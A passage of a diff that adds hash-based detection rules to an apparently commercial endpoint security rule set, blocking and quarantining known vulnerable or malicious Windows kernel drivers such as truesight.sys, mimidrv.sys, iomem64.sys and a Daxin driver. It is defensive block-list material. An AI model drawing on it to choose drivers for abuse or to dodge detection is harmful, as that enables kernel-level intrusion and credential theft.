+ "value": "19696fb0db3fcae22f705ae1eb1e9f1151c823f3ff5d8857e90f2a4a6fdc5758",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b6b5d42-047f-5701-b816-ea56808153fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809099Z",
+ "creation_date": "2026-03-23T11:45:31.809101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71146bcb72abe1519c249a997e237b81a5e1114cd11d597be288f1fb14ec8950",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b6e38a6-8668-5363-babd-bb8e724d9d9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983884Z",
+ "creation_date": "2026-03-23T11:45:29.983886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d23bdbaf9905259d858df5bf991eb23d2dc9f4ecda7f9f77839691acef1b8c4",
+ "comment": "Vulnerable Kernel Driver (aka iomem64.sys) [https://www.loldrivers.io/drivers/04d377f9-36e0-42a4-8d47-62232163dc68/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b754c0f-746d-5bd0-bd45-bb46522bdf02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970332Z",
+ "creation_date": "2026-03-23T11:45:29.970334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970339Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b77122e-246c-50c3-a517-abe3cadb9fdb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808558Z",
+ "creation_date": "2026-03-23T11:45:31.808560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76346678c5d72ce03497bcf4fb35e4c1f64edd453fd755e4b6adda69198ea4f6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b7aa0b2-2dd3-593e-9f68-fd7581590704",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148260Z",
+ "creation_date": "2026-03-23T11:45:31.148261Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148267Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a77532f83971f8d0a982331e4b1d2529e736e52700f99ef646004271ea086217",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b82d260-d3c2-5d88-8e45-95e63c8de79b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812703Z",
+ "creation_date": "2026-03-23T11:45:31.812706Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a023cdcc0d263f711310ee1161bc05a04b596fcb5915939a684fdc9e20139b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b8aff84-1923-526d-935c-de85a5980537",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828084Z",
+ "creation_date": "2026-03-23T11:45:30.828086Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828091Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "810ab8565dfc1d44151ae8c878be0944abf706877e31f51a12695c06efbec4b9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b901092-727a-5aa7-9c74-f99c9457aa56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476052Z",
+ "creation_date": "2026-03-23T11:45:31.476056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476065Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f50b81473c5bf95988b4c8a0e8eabd83648384dc96180ba197e3e18f3aac0a5d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b9ad25c-ae7a-5038-9c69-63260519fe4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609962Z",
+ "creation_date": "2026-03-23T11:45:29.609965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a363deaf1790e9c0610e07a7203749aab8b60f5ededc944abc0ef3010f5e2105",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3b9ce25a-9dee-5045-8775-d8a47dc50ae8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827176Z",
+ "creation_date": "2026-03-23T11:45:31.827178Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "781b7d5905d14e413214d0d72734441fca5fd3cf906a1403d231359024ecc296",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ba27702-bd96-563a-ae42-6ae696246e7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461810Z",
+ "creation_date": "2026-03-23T11:45:30.461813Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461822Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3033ff03e6f523726638b43d954bc666cdd26483fa5abcf98307952ff88f80ee",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3babf603-8f45-5ea9-b206-a36f01fd7707",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605504Z",
+ "creation_date": "2026-03-23T11:45:29.605506Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3576ebbab0429cb0b7624836821f5f062c60cdda80432768544f0ff9ee79b55",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3bd2bf60-daab-5ab9-8247-225b5b1292fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472836Z",
+ "creation_date": "2026-03-23T11:45:31.472839Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472849Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe3320bb661b71a041cf0d6964db8cdc0d1210a0a6a21012a979a208a6715b30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3bd7085a-822c-552d-9135-80c21909757f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819691Z",
+ "creation_date": "2026-03-23T11:45:30.819693Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819698Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d777a9e2c61e8b55b3c34c5265b301454bb080abe7ffb373e7800bd6a498f8d",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3bdd31a0-2846-5813-b231-88d99bbf0a7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480732Z",
+ "creation_date": "2026-03-23T11:45:30.480734Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bfc121e93fcbf9bd42736cfe7675ae2cc805be9a58f1a0d8cc3aa5b42e49a13f",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3be063c8-46d0-5abc-9e05-a6280ed5ce7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461668Z",
+ "creation_date": "2026-03-23T11:45:30.461671Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "208ea38734979aa2c86332eba1ea5269999227077ff110ac0a0d411073165f85",
+ "comment": "Vulnerable Kernel Driver (aka titidrv.sys) [https://www.loldrivers.io/drivers/705facba-b595-41dd-86a6-93aefe6a6234/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3bea576f-f35e-50f0-855d-269ca19841fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492757Z",
+ "creation_date": "2026-03-23T11:45:31.492761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492769Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c0d7ab7cf7d60bc75e37ad417daca7ab8c4916485270b13d5cea7e1fd953b2f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3bf26f1a-62bd-5c90-a0e8-7f730b22fe47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470814Z",
+ "creation_date": "2026-03-23T11:45:30.470817Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcad50a13dcf1eeefffe2c2f51a052fd13bfaeddb0bd1f3c2353c64284ea62e2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3bfd60ed-6600-5aeb-9620-d6b92e26a5dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985832Z",
+ "creation_date": "2026-03-23T11:45:29.985834Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16a1977a9251d6d4bec86bb0702a97bcaefa94444bbfe3978af2f79ee10d62a6",
+ "comment": "Malicious Kernel Driver (aka NQrmq.sys) [https://www.virustotal.com/gui/file/ad938d15ecfd70083c474e1642a88b078c3cea02cdbddf66d4fb1c01b9b29d9a] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3bfdc963-0463-50ad-821d-b7a6c4799a86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982555Z",
+ "creation_date": "2026-03-23T11:45:29.982557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982563Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "389d04a947be32b43eab5767f548fc193e9ac5fe5225a3b6dc26ddc80c326d7d",
+ "comment": "Malicious Kernel Driver (aka daxin_blank1.sys) [https://www.loldrivers.io/drivers/1bf3b155-752a-4cc7-beb0-f202e525eb1a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c02528b-4c5b-5c33-b0fb-66739f908bf3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155596Z",
+ "creation_date": "2026-03-23T11:45:31.155599Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3bdfd308d29f5f5c07035701a30d4120b69c7ae4003ca179a41e69d9e6b961c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c025e53-97ec-5444-a1a0-5835d910d984",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981367Z",
+ "creation_date": "2026-03-23T11:45:29.981369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "854bc946b557ed78c7d40547eb39e293e83942a693c94d0e798d1c4fbde7efa9",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3c04061b-eed1-51ed-99ed-fa4a4dfef853",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
